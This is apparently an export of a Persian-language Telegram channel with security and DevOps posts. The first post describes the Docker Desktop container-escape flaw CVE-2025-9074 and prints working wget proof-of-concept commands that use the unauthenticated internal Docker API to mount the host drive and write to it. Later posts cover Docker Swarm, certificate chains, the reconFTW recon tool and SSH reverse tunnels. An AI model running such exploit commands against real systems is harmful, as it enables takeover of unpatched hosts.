Xero Notes – Telegram
Channel created
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
🔥101🤮1
🐳 داکر سوارم (Docker Swarm): ارکستراسیون ساده و سریع برای کانتینرها
داکر سوارم یک ابزار قدرتمند و سبک برای مدیریت و ارکستراسیون کانتینرهای داکر است که به شما امکان می‌دهد کانتینرهای خود را به‌صورت خودکار، مقیاس‌پذیر و امن مدیریت کنید. این ابزار با سادگی و سرعت بالا، گزینه‌ای عالی برای پروژه‌های کوچک و متوسط است. در ادامه، با ویژگی‌ها، نحوه‌ی راه‌اندازی و مقایسه‌ی آن با ابزارهای دیگر آشنا می‌شویم.

💠 چرا داکر سوارم؟
داکر سوارم نسبت به ابزارهای مشابه مثل Docker Compose و Kubernetes مزایای زیر را دارد:
- امنیت بالا: ارتباط بین نودها به‌صورت پیش‌فرض با پروتکل TLS رمزنگاری می‌شود. سوارم به‌طور خودکار گواهی‌های امنیتی را مدیریت کرده و امکان چرخش (rotation) آن‌ها را فراهم می‌کند.
- مدیریت سیکرت‌ها (Secrets): می‌توانید کلیدها، پسوردها و اطلاعات حساس را به‌صورت رمزنگاری‌شده ذخیره کنید. فقط سرویس‌های مجاز به این اطلاعات دسترسی دارند.
- سادگی و سرعت: برخلاف Kubernetes که پیچیدگی بیشتری دارد، سوارم راه‌اندازی و استفاده‌ی آسان‌تری ارائه می‌دهد.
- مقیاس‌پذیری: امکان اجرای سرویس‌ها روی چندین نود و مقیاس‌بندی خودکار را فراهم می‌کند.

💠 مقایسه با Docker Compose و Kubernetes
- Docker Compose:
ویژگی‌ها: ساده، مناسب برای تست و توسعه روی یک سرور، بدون قابلیت مقیاس‌پذیری.
مناسب برای: پروژه‌های محلی و توسعه.
- Kubernetes:
ویژگی‌ها: پیشرفته، قدرتمند، اما پیچیده و سنگین، نیاز به تنظیمات و یادگیری زیاد.
مناسب برای: پروژه‌های بزرگ و پیچیده.
- Docker Swarm:
ویژگی‌ها: سبک، ساده، سریع، با امنیت بالا و مقیاس‌پذیری مناسب.
مناسب برای: پروژه‌های کوچک تا متوسط.

🛠 راه‌اندازی داکر سوارم
برای شروع کار با سوارم، کافی است چند دستور ساده اجرا کنید:

۱- ایجاد کلاستر سوارم:
docker swarm init   

این دستور سرور فعلی را به یک نود مدیر (Manager Node) تبدیل می‌کند و کلیدها و توکن‌های امنیتی لازم را تولید می‌کند. حتی اگر فقط یک نود داشته باشید، سوارم قابل استفاده است.
پس از اجرا، یک توکن نمایش داده می‌شود که برای افزودن نودهای جدید به کار می‌رود.

۲- افزودن نود جدید (Worker):
دستور join که هنگام init نمایش داده می‌شود را روی سرور دوم اجرا کنید:
docker swarm join --token <TOKEN> <MANAGER_IP>:2377

با این کار، نود جدید به Swarm متصل می‌شود و می‌تواند سرویس‌ها را اجرا کند.

۳- ایجاد سرویس به جای Compose:
به جای استفاده از `docker-compose.yml`، می‌توانید سرویس‌ها را با دستور زیر ایجاد کنید:
docker service create --replicas 3 -p 80:80 nginx

این دستور یک سرویس با ۳ نمونه (replica) از تصویر nginx ایجاد می‌کند که روی پورت ۸۰ در دسترس خواهد بود.

🔒 تعریف سیکرت (Secret)
برای ذخیره اطلاعات حساس مثل پسوردها:

۱- ایجاد سیکرت:
echo "mypassword123" | docker secret create app_password -


۲- اختصاص سیکرت به سرویس:
docker service create \
--name my_app \
--replicas 2 \
--secret app_password \
<container>


۳- مشاهده سیکرت در کانتینر:
سیکرت به‌صورت فایل در مسیر /run/secrets/ قرار می‌گیرد. برای مشاهده:
docker exec -it <container_id> cat /run/secrets/db_password

خروجی: mypassword123

🚪 خارج شدن یا ترک Swarm
برای خارج کردن یک نود کارگر (Worker) از کلاستر:
docker swarm leave


برای حذف کامل کلاستر (از نود مدیر):

docker swarm leave --force  


چرا داکر سوارم انتخاب خوبی است؟

داکر سوارم با ترکیب سادگی، امنیت و مقیاس‌پذیری، گزینه‌ای عالی برای مدیریت کانتینرها در پروژه‌های کوچک تا متوسط است. اگر به دنبال راه‌حلی سبک‌تر از Kubernetes و قدرتمندتر از Compose هستید، سوارم می‌تواند نیازهای شما را به‌خوبی برآورده کند.

#Docker #DevOps #Orchestration
@Xero_Notes
🔥5👍2
🔒 زنجیره‌ی گواهی چیست؟
زنجیره‌ی گواهی (Certificate Chain) مجموعه‌ای از گواهی‌های دیجیتال است که برای ایجاد اعتماد بین یک وب‌سایت و مرورگر یا دستگاه کاربر به کار می‌رود. وقتی شما به سایتی با پروتکل HTTPS متصل می‌شوید، مرورگر شما نیاز دارد تا مطمئن شود گواهی SSL/TLS ارائه‌شده توسط سایت معتبر است و هویت سایت را تأیید می‌کند. این اعتماد از طریق زنجیره‌ی گواهی برقرار می‌شود که مسیری از گواهی سایت تا یک مرجع صدور گواهی ریشه‌ای (Root CA) را تشکیل می‌دهد.

💠 مرجع صدور گواهی (CA) چیست؟
مرجع صدور گواهی یا CA (Certificate Authority) نهادی معتبر است که وظیفه‌ی صدور گواهی‌های دیجیتال را بر عهده دارد. این گواهی‌ها مانند یک مدرک شناسایی دیجیتال عمل می‌کنند و هویت یک وب‌سایت یا سرویس را تأیید می‌کنند تا کاربران بتوانند با اطمینان به آن متصل شوند.

💠 انواع CA (ریشه‌ای و میانی)
‏- Root CA (مرجع ریشه): این مراجع در بالاترین سطح اعتماد قرار دارند. کلید عمومی آن‌ها از پیش در مرورگرها و سیستم‌عامل‌ها (مانند ویندوز، مک، اندروید یا iOS) ذخیره شده است. به عبارت دیگر، دستگاه شما به‌طور پیش‌فرض به این مراجع اعتماد دارد.
‏- CA میانی (Intermediate CA): به دلایل امنیتی، Root CAها به‌صورت مستقیم برای وب‌سایت‌ها گواهی صادر نمی‌کنند. در عوض، آن‌ها به مراجع میانی گواهی می‌دهند، و این CAهای میانی هستند که گواهی‌های دیجیتال را برای وب‌سایت‌ها یا سرویس‌ها صادر می‌کنند. این ساختار باعث کاهش ریسک و افزایش امنیت می‌شود.

💠 زنجیره‌ی گواهی چگونه کار می‌کند؟
زنجیره‌ی گواهی مسیری است که مرورگر برای تأیید اعتبار گواهی یک وب‌سایت طی می‌کند. این مسیر به‌صورت زیر است:

۱- گواهی وب‌سایت (End-user Certificate): این گواهی توسط یک CA میانی امضا شده و هویت سایت را تأیید می‌کند.
۲- گواهی CA میانی: این گواهی خود توسط یک CA دیگر (میانی دیگر یا Root CA) امضا شده است.
‏۳- Root CA: در نهایت، زنجیره به یک مرجع ریشه‌ای می‌رسد که کلید عمومی آن از قبل در مرورگر یا سیستم‌عامل ذخیره شده است.

اگر این زنجیره کامل باشد و تمام گواهی‌ها به درستی به Root CA متصل شوند، مرورگر اتصال را امن تشخیص می‌دهد و علامت قفل سبز یا نشانه‌ای از اتصال امن را نمایش می‌دهد. اما اگر بخشی از زنجیره (مثلاً گواهی CA میانی) مفقود یا نادرست باشد، مرورگر پیغام خطایی مانند «گواهی نامعتبر» یا «اتصال ناامن» نشان می‌دهد.

💠 محل قرارگیری CAها
‏- Root CA: گواهی‌های ریشه‌ای از پیش در مخزن اعتماد (Trust Store) مرورگرها و سیستم‌عامل‌ها ذخیره شده‌اند. این مخزن مانند فهرستی از مراجع مورد اعتماد است که دستگاه شما به آن‌ها اطمینان دارد.
‏- CA میانی: گواهی‌های میانی معمولاً همراه با گواهی وب‌سایت روی سرور سایت نصب می‌شوند تا مرورگر بتواند زنجیره‌ی گواهی را تکمیل کند.

💠مثال عملی
فرض کنید شما برای دامنه‌ی example.com یک گواهی SSL/TLS خریداری می‌کنید:
شرکت صادرکننده‌ی گواهی، یک گواهی دیجیتال برای دامنه‌ی شما (End-user Certificate) ارائه می‌دهد. این گواهی توسط یک CA میانی امضا شده است. شما باید فایل گواهی CA میانی را نیز روی سرور خود نصب کنید. گواهی CA میانی نیز توسط یک CA بالاتر (یا مستقیماً Root CA) امضا شده است. وقتی کاربری به سایت شما متصل می‌شود:
۱- مرورگر گواهی وب‌سایت شما را بررسی می‌کند.
۲- سپس مسیر امضاها را دنبال می‌کند تا به Root CA برسد.
۳- اگر زنجیره کامل باشد و Root CA در مخزن اعتماد مرورگر وجود داشته باشد، اتصال امن تأیید می‌شود و کاربر نشانه‌ای مانند قفل سبز را مشاهده می‌کند.

💠 خلاصه
زنجیره‌ی گواهی مسیری است که اعتماد را از گواهی وب‌سایت تا یک مرجع ریشه‌ای (Root CA) برقرار می‌کند. Root CAها از پیش در سیستم‌ها و مرورگرها به‌عنوان مراجع مورد اعتماد شناخته شده‌اند، و CAهای میانی نقش واسطه‌ای بین آن‌ها و وب‌سایت‌ها دارند. اگر تمام اجزای این زنجیره به درستی در دسترس باشند، اتصال امن برقرار می‌شود؛ در غیر این صورت، خطای عدم اعتماد ظاهر خواهد شد.
این ساختار تضمین می‌کند که کاربران بتوانند با اطمینان به وب‌سایت‌ها متصل شوند و از امنیت ارتباطات خود مطمئن باشند.

اما اگر گواهی CA میانی روی سرور نصب نشده باشد، مرورگر نمی‌تواند زنجیره را تکمیل کند و خطایی مبنی بر عدم اعتماد به گواهی نمایش می‌دهد.

#CertificateChain #DigitalSecurity #SSLCertificate
@Xero_Notes
🔥6
💠 reconFTW

ابزار reconFTW فرآیند شناسایی و جمع‌آوری اطلاعات درباره اهداف را به‌صورت خودکار انجام می‌دهد. این ابزار با بهره‌گیری از روش‌های پیشرفته، امکان شناسایی زیرساخت‌های شبکه‌ای و بررسی آسیب‌پذیری‌های متعدد را فراهم می‌کند و اطلاعات جامعی را در اختیار کاربران قرار می‌دهد تا در تحلیل و ارزیابی اهداف خود پیشرو باشند.

برای شناسایی زیرساخت‌ها، این ابزار از تکنیک‌های متنوعی مانند شناسایی غیرفعال، جستجوی فراگیر، تغییرات در نام‌های دامنه، استفاده از داده‌های گواهینامه‌های شفافیت، تحلیل کد منبع وب‌سایت‌ها، بررسی داده‌های تحلیلی، و کاوش سوابق DNS بهره می‌برد. این روش‌ها به شناسایی زیرساخت‌های کلیدی و مرتبط با هدف کمک می‌کنند و اطلاعات ارزشمندی را برای تحلیل رقابتی ارائه می‌دهند.

علاوه بر این، ReconFTW قابلیت بررسی انواع آسیب‌پذیری‌های امنیتی را داراست، از جمله حملات اسکریپت‌نویسی بین‌سایتی (XSS)، تغییر مسیرهای غیرمجاز، تزریق سرور-کلاینت (SSRF)، تزریق کد در هدرهای HTTP (CRLF)، دسترسی غیرمجاز به فایل‌های محلی (LFI)، تزریق SQL، بررسی امنیت پروتکل SSL، تزریق قالب‌های سمت سرور (SSTI)، و انتقال منطقه DNS. این ابزار همچنین امکاناتی نظیر جمع‌آوری اطلاعات از منابع عمومی (OSINT)، کاوش دایرکتوری‌ها، جستجوی هدفمند در موتورهای جستجو (دورکینگ)، اسکن پورت‌ها، ثبت تصاویر از صفحات وب، و اجرای اسکن‌های پیشرفته با استفاده از ابزارهایی مانند Nuclei را ارائه می‌دهد.

🔗 https://github.com/six2dez/reconftw

#Cybersecurity #PenetrationTesting #Reconnaissance
@Xero_Notes
2
💠 ریورس تانل SSH
ریورس تانل SSH تکنیکی است که امکان دسترسی به یک سیستم محلی (پشت فایروال یا بدون آی‌پی عمومی) را از طریق یک سرور راه‌دور فراهم می‌کند. برخلاف فورواردینگ معمولی SSH که ترافیک را از سیستم محلی به سرور هدایت می‌کند، در ریورس تانل، ترافیک از سرور راه‌دور به سیستم محلی منتقل می‌شود. این روش برای دسترسی به سرویس‌های محلی در شبکه‌های محدود بسیار کاربردی است.

💠 نحوه کار ریورس تانل
برای ایجاد تونل معکوس، از دستور SSH با گزینه R- استفاده می‌شود. ساختار دستور به این شکل است:
ssh -R [remote-port]:[local-host]:[local-port] [user]@[remote-server]


مثال: اگر سرویسی روی سیستم محلی شما (localhost) و پورت 3000 اجرا می‌شود و می‌خواهید از طریق سرور راه‌دور (remote-server.com) و پورت 8080 قابل دسترس باشد، دستور زیر را اجرا می‌کنید:
ssh -R 8080:localhost:3000 user@remote-server.com


در این حالت، درخواست‌های ارسالی به پورت 8080 سرور راه‌دور به پورت 3000 سیستم محلی شما هدایت می‌شوند.

💠 کاربردها
- دسترسی به سرویس‌های داخلی مانند وب‌سرورها یا دیتابیس‌های پشت NAT.
- مدیریت دستگاه‌های شبکه از راه دور بدون نیاز به آی‌پی عمومی.
- اشتراک‌گذاری منابع محلی با تیم یا سیستم‌های خارجی.

ریورس تانل SSH ابزاری انعطاف‌پذیر برای دور زدن محدودیت‌های شبکه‌ای است که برای مدیران شبکه و متخصصان فنی راه‌حلی کارآمد برای دسترسی به سیستم‌های محلی ارائه می‌دهد.

#ReverseTunneling #SSH #NetworkAccess
@Xero_Notes
2